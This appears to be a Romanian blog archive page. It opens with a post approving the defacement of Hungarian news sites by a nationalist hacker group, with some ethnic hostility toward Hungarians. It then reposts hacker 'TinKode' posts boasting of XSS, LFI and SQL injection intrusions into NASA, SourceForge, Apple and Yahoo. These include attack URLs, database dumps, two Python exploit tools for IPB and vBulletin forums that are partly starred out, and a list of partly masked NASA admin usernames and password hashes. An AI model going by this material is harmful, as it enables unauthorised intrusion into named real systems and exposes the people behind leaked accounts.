Showing posts with label TinKode Hacker. Show all posts
Showing posts with label TinKode Hacker. Show all posts

Tuesday, February 7, 2012

Romanian National Security (RNS) pune Ungaria la pamant – Avram Iancu este motivul!


La aproape un an de la ultimile lovituri date de organizaţia Romanian National Security (RNS), gruparea a ieşit la iveală, de nicăieri. Pentru cei care au pierdut evenimentele de anul trecut, RNS este o organizaţie de hackeri români ce au luat în mâini legea şi “pedepsesc” statele străine, în special presa online şi televiziunea, accesând şi modificând paginile principale ale acestora în mod neautorizat. Anul trecut a fost un val de atacuri venit din partea grupării îndreptat către state precum UK, Italia, Franţa ce au publicat în media articole şi înregistrări în care românii erau confundaţi cu ţiganii într-un mod josnic.
După acele raiduri, gruparea a intrat în anonimat şi nici până astăzi nu sunt cunoscute informaţii concrete despre băieţii care organizează aceste raiduri. Unii susţin că grupul nu ar fi nici măcar român, deşi mesajele nu prea confirmă acest lucru.

De ce Ungaria?

În urmă cu câteva zile, extremiştii maghiari din Plutonul Secuiesc, organizaţie extremistă afiliată Gărzii Maghiare, au organizat, la Miercurea Ciuc, cu ocazia Zilei maghiarilor,o manifestatie publica in care l-au "spanzurat" pe Avram Iancu, liderul moţilor care au luptat în 1848-1949 cu trupele maghiare conduse de Kosuth Lajos.

Analiza atacului

Evenimentul a dat naştere unui val de proteste, care a atins şi gruparea RNS ce la doar 5 zile de la eveniment loveşte puternic Ungaria. Mesajul publicat de aceştia fac referire directă la evenimentul de pe 15.03.2011. Atacul din această dimineaţă a afectat patru dintre cele mai importante surse de informaţie din Ungaria, printre care amintim tv2.hu (#1#2#3), budapesttimes.humagyarhirlap.hu (site-ul este indisponibil deja) şi echotv.hu. Toate aceste website-uri au avut afectate pagina principală sau o parte din subdomenii. Structura paginii este asemănătoare cu cea folosită în atacurile de anul trecut ce ne poate duce cu gândul la aceeaşi grupare, dar acest lucru nu îl garantează nici ei, şi nici nimeni altcineva momentan. Motivul ce este invocat de mesajul deţinut de site-urile presei şi televiziunii din Ungaria confirmă faptul că ei doar doresc să atragă atenţia asupra faptului că istoria României nu poate fi alterată şi umilită de o minoritate, cum sunt ungurii.
Rămâne de văzut cine va avea de suferit. :-)


Notă : Materialul prezentat reprezintă doar relatarea evenimentului,  jokeshahaa.blogspot.com nu a incurajat şi nu incurajează astfel de demersuri.

Avram Iancu, \"spânzurat\" la Miercurea Ciuc de extremiştii maghiari

Extremiştii maghiari din Plutonul Secuiesc, organizaţie extremistă afiliată Gărzii Maghiare, au organizat ieri, la Miercurea Ciuc, cu ocazia Zilei maghiarilor de pretutindeni, o manifestăţie publică în care l-au \"spânzurat\" pe Avram Iancu, liderul moţilor care au luptat în 1848-1949 cu trupele maghiare conduse de Kosuth Lajos.

Potrivit blogului lui Csibi Barna, liderul Plutonul Secuiesc, ieri, la ora 17.00, a avut loc la Miercurea Ciuc, la intersecţia străzilor Majlath Gusztav Karly şi Petofi Sandor o minisesiune de comunicări legate de evenimentele dini 1848-1849.
"În cadrul acestei sesiuni de comunicări s-au putut vedea secvenţe din genocidul comis cu o sălbăticie animalică de răzvrătiţii moţi conduşi de Avram Iancu, Petru Dobra şi Axente Sever. Victimele acestora au fost civili, bătrâni, femei şi copii. Au fost expuse ilustrate cu aceste atrocităţi sub care se puteau observa tăbliţe pe care se putea citi «din atrocităţile valahilor». Pentru crimele şi genocidul pus la cale de Avram Iancu acesta fost condamnat la moarte, sentinţa fiind executată pe loc", se arată pe blogul lui Csibi Barna.
Referitor la incidentul de la Miercurea-Ciuc, liderul UDMR, Kelemen Hunor, ne-a declarat că este un incident regretabil.
"Astăzi (ieri - n.r.) am aflat şi eu, este un act regretabil. Noi, UDMR-ul, mereu am spus că respectul reciproc este un principiu de bază şi am condamnat întotdeauna astfel de acţiuni. Acesta este un act regretabil", a conchis Kelemen Hunor.

Cluj Napoca: manifestări fără incidente 

La Cluj Napoca, Ziua maghiarilor de pretutindeni a fost sărbătorită de aproape 1.000 de etnici maghiari. Ca în fiecare an, maghiarii s-au adunat la catedrala Sfântul Mihail, unde a fost oficiată o slujbă religioasă după care s-au îndreptat spre clădirea unde, în 1848, a petrecut mai multe nopţi poetul Petofi Sandor şi unul dintre liderii revoluţiei române, Nicolae Bălcescu.
După ce s-a recitat poezia lui Petofi Sandor "Talpra magyar" ("Ridică-te maghiare" – n.r.), au fost depuse coroane de flori. La manifestări nu au participat personalităţi important ale lumii maghiare, UDMR fiind reprezentat de de preşedintele filialei Cluj, Laszlo Attila.

Sunday, February 5, 2012

TinKode-How to find XSS in NASA


How to find XSS in NASA

Posted by isrtinkode on February 16, 2010
__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\
#How to find XSS in NASA?
Verry simple. What you have to do, is only to type on google, inurl:”tinkode”, and that it’s all.
Link google:
http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=*********&start=40&sa=N
Link Nasa XSS:
http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%*********TinKode/%29%3C/script%3E
Yeah, this XSS is indexed on google, LOL.
Another XSS in NASA:
1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3*********/script%3E
2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3C*********%29%3C/script%3E
3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%*********/c0de.breaker/)%3C/script%3E
4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=*********)%3C/script%3E
5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=*********)%3C/script%3E
6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=*********)%3C/script%3E
etc

TinKode-SourceForge LFI


SourceForge LFI

Posted by isrtinkode on February 18, 2010
 ____                            __
/ ___|  ___  _   _ _ __ ___ ___ / _| ___  _ __ __ _  ___
\___ \ / _ \| | | | '__/ __/ _ \ |_ / _ \| '__/ _` |/ _ \
 ___) | (_) | |_| | | | (_|  __/  _| (_) | | | (_| |  __/
|____/ \___/ \__,_|_|  \___\___|_|  \___/|_|  \__, |\___|
                                              |___/
Link: Sourceforge.net
Yeah, it’s vulnerable to LFI (Local File Inclusion).
http://in-dtsc.sourceforge.net/index.php?content=**********
http://in-dtsc.sourceforge.net/index.php?content=*******/conf/htt***.conf
For more informations read a tutorial about LFI.

TinKode-APPLE Vulnerable to Blind SQLi


APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010
          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode
@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.
Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.
Testing:


Now let’s see the version
#Version: 5
#Databases: locator_asiatest
#Tables from “locator_asia” database
[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log
#Tables from “test” database
[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp
Columns from “reseller_city_utf8” table
[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4
A good thing is that there is nothing important to extract…
Great, good bye, TinKode

TinKode-Yahoo Blind SQL Injection


Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010
__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania
Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.
Vulnerable website: http://hk.adspecs.yahoo.com
Testing…


In this picture we can see as SELECT work
Now we try to find the version:
#Version: 5.0.11.24
Ok, it’s normal until now, but we can have access to mysql.user (bad)
And some tables from mysql.user (default)
MySQL Database, Table: user
#user
#password
~TinKode

TinKode-IPB Full Disclosure Exploit [Python]


IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################
#! /usr/bin/env python3.1 
 
################################################################ 
#           _____ _____  ____  (validator.php)            # 
#         |_   _|  __ \|  _ \                            # 
#    | | | |__) | |_) |                           # 
#     | | |  ___/|  _ <                            # 
#     _| |_| |    | |_) |                           # 
#     |_____|_|    |____/                            # 
#                                   @expl0it...                # 
################################################################ 
#          [ IPB Files / Directories Full Disclosure ]         # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                 Special thanks for: cmiN                     # 
#                 www.TinKode.BayWords.com                     # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                      _____ _____  ____    (TM)                | 
\t |                     |_   _|  __ \|  _ \                       | 
\t |                       | | | |__) | |_) |                      | 
\t |                       | | |  ___/|  _ <                       | 
\t |                      _| |_| |    | |_) |                      | 
\t |                     |_____|_|    |____/                       | 
\t |                                                               | 
\t |                                                               | 
\t |                  IPB Full Disclosure expl0it                  | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |                                                               | 
\t |         Visit: www.insecurity.ro & www.darkc0de.com           | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  ipbfd.py scan http://www.site.com/IPB_folder           | 
         |        ipbfd.py download *.zip -> all                         | 
         |        ipbfd.py download name.jpg -> one                      | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(********) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "********": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********]) 
        except Exception as message: 
            print("An error occurred: ********)) 
        except: 
            print("Unknown error.") 
        else: 
            print(********") 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]Extracting content...") 
    hurl = url + "/validator.php" 
    with ********.********) as usock: 
        source = usock.read().decode() 
    print("[+]Finding token...") 
    word = "validate('" 
    index = source.find(word) 
    if index != -1: 
        source = source[********):] 
        value = source[:source.index(********)] 
        hurl = url ********.format(********) 
    else: 
        print("[!]Token not found.") 
    print("[+]********...") 
    with urllib.request.******** as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = line.decode() 
            index = line.find(********) 
            if index != -1: 
                lastk = line[index + ********" ").strip(********) 
            index = line.find(********") 
            if index != -1: 
                lastv = line[index + ********:line.index("********")].********(" ") 
            if lastk != None and lastv != None: 
                index = ********") 
                if index in (********, 0): 
                    lastk = "[other] {}".format(lastk) 
                else: 
                    lastk = "[********}".format(********) 
                dictionary[********astv 
                ******** = None, None 
    print("[+]Organizing and saving paths...") 
    with open("********", "********") as fout: 
        fout.write(********) 
        keys = sorted(********) 
        for key in keys: 
            fout.write(********)) 
 
 
def download_data(files): 
    print("[+]Searching ********...") 
    mthreads = ******** 
    with open(********) as fin: 
        url = fin.readline()********) 
        if files.find("*") == -1: 
            hurl = ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = l********) 
                if pieces[0].count(ext) == 1: 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active********reads: 
                        pass 
                    Download(********) 
    while threading.active_count(******** 
        pass 
 
 
class Download(********): 
 
    def __********): 
        threading.Thread.********) 
        ******** = url 
 
    def run(self): 
        try: 
            with urllib.request.urlopen(********usock: 
                data = ********) 
                uparser = urllib.parse.urlparse(********) 
                pieces = uparser.********) 
                ******** = pieces[********] 
                with open(********) as fout: 
                    fout.********) 
        except: 
            pass 
 
 
********__main__": 
    main()


You must have python 3.1 to work!

TinKode-vBulletin Full Disclosure [Python]


vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################
#! /usr/bin/env python3.1 
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "scan": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********) 
        except Exception as message: 
            print("An error occurred: {}".********) 
        except: 
            print("Unknown error.") 
        else: 
            print(********) 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]********...") 
    hurl = url + "/validator.php" 
    with urllib.request.******** as usock: 
        source = ********() 
    print("[+]Finding ********") 
    word = "validate('" 
    source = source[source******** + len(word):] 
    value = ********] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator********(value) 
    with urllib.request.urlopen(hurl) as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = ********() 
            index = ********") 
            if index != -1: 
                lastk = line[index ********(" ") 
            index = line.find("********") 
            if index != -1: 
                lastv = line********) 
            if lastk != None and lastv != None: 
                index = ********) 
                if index in (-1, 0): 
                    lastk = "********) 
                else: 
                    lastk = "[{}] {}".format(********) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open(********) as fout: 
        fout.********) 
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write********(key, dictionary[key])) 
 
 
def download_data(files): 
    print("[+]Searching and downloading files...") 
    ******** = 50 
    with open("********) as fin: 
        url = fin.readline(********) 
        if files.find********
            hurl = url + ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = line********) 
                if pieces[0].******** 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active_********) > ******** 
                        pass 
                    Download(********).start() 
    while threading.********) > 1: 
        pass 
 
 
class Download(********): 
 
    def __init__(self, url): 
        threading.Thread.__********) 
        self.url = ******** 
 
    def run(********): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = ********() 
                uparser = urllib.parse.urlparse(********) 
                pieces = ********.********) 
                fname = pieces[********] 
                with open(********) as fout: 
                    ********.write(data) 
        except: 
            pass 
 
 
********"__main__": 
    main()


You need python 3.1 to work!

TinKode-NASA 2 Websites Full Access


NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010
 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|
      #owned by c0de.breaker
I had access to:
www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov
Some screens:
http://i44.tinypic.com/vnjl10.png
http://i41.tinypic.com/25j9zle.png
http://i37.tinypic.com/294t26t.png
http://i35.tinypic.com/qnpf9y.png
http://i38.tinypic.com/23r5mw.png
http://i37.tinypic.com/2rfe92u.png
http://i35.tinypic.com/a57s5e.png
Informations:
#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****
Tables from “*****” database:
#access
#branch
#docs
#docsbranch
#intro
#programs
Columns from “access” table:
#Id
#firstName
#lastName
#userName
#userID
#passWd
#projAdmin
#branchAdmin
#userAdmin
#userEmail
#deleteFlag
#dateCreated
#dateExp
Admins Accounts:
http://www.istd.gsfc.nasa.gov
[1]c****n:****2b550647
[2]c****n:****457ee5exxx = pass
[3]c****n:****14414xxx
[4]am****s:****df47xxx
[5]m****a:****b668859ca = demo
[6]pm****es:****b668859ca = demo
[7]hb****h:****b410747xxx
[8]rb****rut:****b410747xxx
[9]bw****r:****f299589xxx
[10]j****on:****dc4acc0xxx
[11]j****s:****c4acc0xxx
[12]l****ia:****4746f1dxxx
[13]g****w:****33e5ba3axxx
[14]j****le:****ff639f44xxx
[15]d****k:****0cf29958xxx
[16]A****s:****42fa7cxxx
http://www.sed.gsfc.nasa.gov
[17]l****y:****c17889xxx
[18]k****m:****9040104xxx
[19]j****ch:****dc4acc0xxx
[20]c****rmann:****027e9a6xxx
[21]rw****ey:****d42fa7cxxx
[22]y****e:****6107b5cxxx
[23]s****n:****cf29958xxx
[24]b****i:****dd3b569xxx
[25]lr****y:****410747xxx
[26]e****l:****bf05750xxx
[27]cd****ka:****bb79660xxx
[29]j****es:****e4746f1xxx
[30]r****z:****d75fb3exxx
[31]t****ley:****90f14657de5 = d41d8cd9
[32]e****ks:****d75fb3exxx
[33]ph****es:****6e3e050xxx
[34]pp****an:****0877c779xxx
[35]ac****n:****5eb1a0fexxx
I didn’t want to damage anything. Only to show that nasa subdomains have many SQLI, XSS, vulnerabilities etc
#Finish, c0de.breaker